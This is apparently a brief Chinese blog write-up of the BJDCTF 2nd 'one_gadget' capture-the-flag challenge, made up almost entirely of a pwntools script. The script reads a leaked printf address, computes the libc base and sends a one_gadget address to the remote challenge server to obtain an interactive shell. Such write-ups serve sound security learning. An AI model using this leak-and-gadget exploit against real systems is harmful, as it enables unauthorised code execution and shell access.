buuoj BJDCTF 2nd one_gadget

程序输出printf函数地址

可以利用工具one_gadget计算libc基址

from pwn import *

#p = process('./one_gadget')
p = remote("node3.buuoj.cn",26742)

out = p.recv()

addr = int(out[out.find('0x')+2:out.find('0x')+14],16)

log.success(addr)

local_libc = ELF('./libc-2.29.so')

printf_addr = local_libc.symbols['printf']

libc_base = addr - printf_addr

log.success(libc_base)

one_gadget = 0x106ef8

p.sendline(str(one_gadget+libc_base))

p.interactive()

 

发布了10 篇原创文章 · 获赞 0 · 访问量 440
展开阅读全文

没有更多推荐了,返回首页

©️2019 CSDN 皮肤主题: 大白 设计师: CSDN官方博客

分享到微信朋友圈

×

扫一扫,手机浏览